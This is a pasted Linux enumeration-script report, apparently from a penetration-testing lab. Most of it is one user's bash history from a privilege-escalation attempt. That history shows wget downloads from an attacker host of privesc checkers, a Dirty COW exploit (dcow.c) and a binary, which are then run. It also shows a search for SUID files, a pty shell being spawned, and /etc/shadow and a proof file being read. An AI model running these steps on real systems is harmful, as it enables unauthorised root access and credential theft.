- -rw-r--r-- 1 root root 2803 2007-09-05 19:48 /etc/adduser.conf
- -rw-r--r-- 1 root root 777 2006-09-12 21:53 /etc/sysctl.conf
- -rw-r--r-- 1 root root 1749 2006-06-21 02:43 /etc/identd.conf
- -rw-r--r-- 1 root root 216 2007-03-07 17:56 /etc/sestatus.conf
- -rw-r--r-- 1 root root 1664 2006-05-25 05:38 /etc/syslog.conf
- -rw-r--r-- 1 root root 807 2011-09-29 22:24 /etc/updatedb.conf
- -rw-r--r-- 1 root root 46 2016-04-19 03:53 /etc/resolv.conf
- [-] Current user's history files:
- -rw------- 1 bob bob 4367 2018-08-07 21:36 /home/bob/.bash_history
- [+] Root's history files are accessible!
- -rw------- 1 root root 35 2016-06-09 07:30 /root/.bash_history
- [-] Location and contents (if accessible) of .bash_history file(s):
- /home/bob/.bash_history
- exit
- exit
- exit
- ls
- cd ..
- ls
- cd ..
- ls
- cd usr
- ls
- cd bin
- ls
- ls
- cd ..
- ls
- cd ..
- ls
- cd var
- ls
- cd bak
- cd backups/
- ls
- cd ..
- ls
- cd /
- find . -exec file {} \; | grep -i elf
- /bin/sh -i
- ls
- id
- /bin/bash
- ls -l
- strings
- strings vmlinuz
- ls
- cd sbin
- ls
- ls -l
- cd ..
- ls
- cd home
- cd bob
- ls
- cd files
- ls
- cat *
- cd ..
- cd ..
- cd ..
- cd tmp
- ls
- wget http://10.11.1.86:8000/linuxprivchecker.py
- wget http://10.11.1.86:8000/linuxprivchecker.py
- wget http://10.11.0.86:8000/linuxprivchecker.py
- python linuxprivchecker.py
- /bin/su
- /usr/bin
- ls
- cd /usr/bin
- ls
- strings at
- strings at
- strings at
- wget http://10.11.0.86:8000/dcow.c
- cd /tmp
- wget http://10.11.0.86:8000/dcow.c
- chmod +x dcow.c
- ./dcow.c
- id
- euid
- ps
- ps -eo pid,user,uid,args
- ps -eo pid,euid | grep YOUR_PID_HERE
- ps
- ps -eo pid,euid | grep 3623
- ps -eo pid,euid | grep 3620
- seteuid(0)
- ps -eo pid,euid | grep 3620
- ./dcow.c
- ./dcow.c
- ./dcow.c
- ./dcow.c
- $PATH
- echo $PATH
- echo $SHELL
- find / -perm -u=s -type f 2>/dev/null
- $PATH=/bin/su
- set $PATH = /bin/su
- echo $PATH
- export PATH="$PATH:/bin/su"
- echo $PATH
- whoami
- id
- ps
- /bin/bash
- ls
- id
- echo $PATH
- ps
- ps -eo pid,euid,ruid,suid | grep 375
- ps -eo pid,euid,ruid,suid | grep 677
- ps -eo pid,euid,ruid,suid | grep 3623
- ps -eo pid,euid,ruid,suid | grep 372
- sudo su
- /bin/su
- /bin.su
- /bin/h
- /bin/sh
- ls
- id
- whoami
- ps -eo pid,euid,ruid,suid | grep YOUR_PID_HEREps -eo pid,euid,ruid,suid | grep YOUR_PID_HEREls
- ls
- ls -l
- cd vmware-root/
- ls
- strings vmware-root/
- /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
- cd /usr/lib/vmware-tools/bin32/
- ls
- ls -l
- strings vmware-user-suid-wrapper
- chmod +x vmware-user-suid-wrapper
- ./vmware-user-suid-wrapper
- id
- whoami
- uid
- id
- sudo -l
- sudo -s
- ls
- cd files
- ls
- cd ~
- ls
- cd ..
- cd ..
- ls
- cd home
- ls
- cd .ssh
- cd bob
- cd .ssj
- cd .ssh
- ls
- cat authorized_keys
- cd ..
- cd ..
- ls
- cd ..
- ls
- cat /etc/passwd
- cat /etc/shadow
- cd root
- ls
- cat proof.txt
- uname -a
- setuid id
- setuid
- setid
- access
- setfsuid
- ps -f -u user1
- ps -f -u bob
- ps -eo pid,euid,ruid,suid | grep 2174
- ps -eo pid,euid,ruid,suid | grep 2175
- ps -eo pid,euid,ruid,suid | grep 2203
- setuid(0)
- setuid() ;
- setuid(0)
- setuid('0')
- setuid(1001)
- setuid
- setuid() 1001
- setuid() -h
- man setuid
- seteuid(0)
- seteuid(1001)
- seteuid() ;
- seteuid(getuid())
- seteuid(getuid(1001))
- getenv("SUDO_UID")
- seteuid(0) /bin/bash
- /bin/bash
- $shell
- $ENV
- python
- pyton -c 'import pty;pty.spawn("/bin/bash")'
- python -c 'import pty;pty.spawn("/bin/bash")'
- cd /tmp
- ls
- wget http://10.11.0.86/linenu.sh
- wget http://10.11.0.86:8000/linenu.sh
- wget http://10.11.0.86:8000/linenum.sh
- wget http://10.11.0.86:8000/linuxprivchecker.py
- ls
- bash linenum.sh
- python linuxprivchecker.py
- wget http://10.11.0.86:8000/a.out
- ./a.out
- chmod +x a.out
- ./a.out
- id
- ps
- ps -aux
- ps -eo pid,euid,ruid,suid | grep 2272
- ps -eo pid,euid,ruid,suid | grep 2175
- nano a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- python a.py
- ps -eo pid,euid,ruid,suid | grep 2175
- sudo
- sudo -h
- sudo --help
- sudo -l
- nano a.py
- python a.py
- nano a.py
- python a.py
- ps -eo pid,euid,ruid,suid | grep 2175
- ps
- ps -eo pid,euid,ruid,suid | grep 2760
- ps -eo pid,euid,ruid,suid | grep 2893
- ps
- /bin/bash
- /bin/sh
- ls
- python a.py
- ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID;
- lsps -efl | grep 'sleep 1' | grep -v gre
- ps -efl | grep 'sleep 1' | grep -v gre
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v
- ps -efl | grep 'sleep 1'
- ps -efl | grep 'sleep 1'
- python a.p
- python a.py
- ls /proc
- cd 2893
- ls
- ls /proc/2893
- ls /proc/2893/fd
- ls /proc/2893/fd/1
- ls /proc/2893/fd/1
- cat /proc/2893/fd/1
- echo n> /proc/2893/fd/1
- echo n >/proc/2893/fd/1
- cat /proc/2893/fd/1
- echo n >/proc/2893/fd/1
- loc
- ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }
- ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID;
- ps -efl | grep 'sleep 1' | grep -v grep
- ps -efl | grep 'sleep 1' | grep -v grep|cut -d " " -f 4
- ps -efl | grep 'sleep 1' | grep -v grep|awk {'print $3'}
- ps -efl | grep 'sleep 1' | grep -v grep|awk {'print $4'}
- python a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- python a.py
- nano a.py
- whoami
- id
- ps aux
- /bin/sh
- ls
- whoami
- id
- /bin/bash
- [-] Any interesting mail in /var/mail:
- total 8
- drwxrwsr-x 2 root mail 4096 2007-09-05 19:45 .
- drwxr-xr-x 13 root root 4096 2007-09-05 19:45 ..
- ### SCAN COMPLETE ####################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement